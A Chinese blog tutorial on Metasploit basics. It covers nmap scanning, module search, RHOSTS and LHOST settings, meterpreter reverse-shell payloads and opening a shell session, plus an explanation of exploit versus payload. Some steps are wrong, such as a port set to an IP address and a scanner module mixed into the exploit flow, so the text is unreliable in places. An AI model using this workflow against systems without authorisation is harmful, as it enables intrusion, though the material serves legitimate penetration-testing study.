我喜欢SEO、网络营销及建站,希望与志同道合的您
建立合作或相互学习关系 QQ:10343829

Metasploit教程

开启:   kali自带,使用msfconsole,即可启动。

1.  使用nmap扫出开放端口与端口对应的服务。

2. 例如开启了21端口,经过nmap查询nmap使用的是pure-FTPd服务

3. 在msfconsole中搜索Pure-FTPd,红框中就是搜索结果:search Pure-FTPd,如果搜索结果中有多个,优先选择       被标记为“Excellent”的模块,并查看描述信息。

4.  开始使用

(1.)>use auxiliary/scanner/portscan/tcp   // 告诉系统我要使用这个模块模块

(2.)>show options  //查看配置,哪些配置需要我们设置,yes是必须设置的。

(3.)>show targets    >set targets 2   //显示可以渗透哪些主机类型//设定为哪种攻击类型。

(4.)>set rhosts 192.168.0.1     //设置要溢出的远程主机ip

(5.)>set rport 192.168.0.1     //设置要溢出的远程主机端口

(5.)>set LHOST 192.168.88.155  //设置本地监听ip

(6.)>set LPORT 4444     //设置本地监听端口

(5.)> set threads 20  //设置线程20

(6.)>show payloads  //查看可以使用的payloads

(6.)> set payload    // 就是设置payout,就是漏洞利用成功后要执行的语句。

(7.)>exploit // 开始利用漏洞

(8.)>sessions -i 1    //开始交互,判断是否成功,然后进入cmdshll

5. 如何选择合适的payout ?

几种常见的payload:

windows/meterpreter/bind_tcp #正向连接(不常用,信息量太大,易出错)

windows/meterpreter/reverse_tcp #反向连接(常用)

windows/meterpreter/reverse_http #通过监听80端口反向连接

windows/meterpreter/reverse_https #通过监听443端口反向连接

本知识点参考地址:  https://blog.csdn.net/weixin_44270509/article/details/98945955

6. 关于 exploit 和 payload 的理解

  exploit是指利用漏洞的一个过程和方法,最终的目的是为了执行payload,payload才是真正实现我们攻击的代码(获得shell等等)以缓冲区溢出为例,exploit模块告诉你在寄存器中要填充多少个字符,让寄存器下一条指令执行的代码位置跳转到我们的payload上在使用exploit时,我们都是用 use 去使用的,在exploit模块中,我们可以 set 调用各种payload如果我们不想使用exploit,而是直接使用payload,我们也可以直接用 use 使用一个payload一样可以通过show options查看有哪些参数需要设置。

这里的RHOST是指受害机器只接受某个远程主机来连接它的4444端口(4444是受害机器开放的端口),限制了来源IP,我们这里可以不用设置。但是如果被其他人扫到这个端口,他们也可以连接上去获得shell。

 

转载请著名来源:天天小站 » Metasploit教程

分享到:更多 ()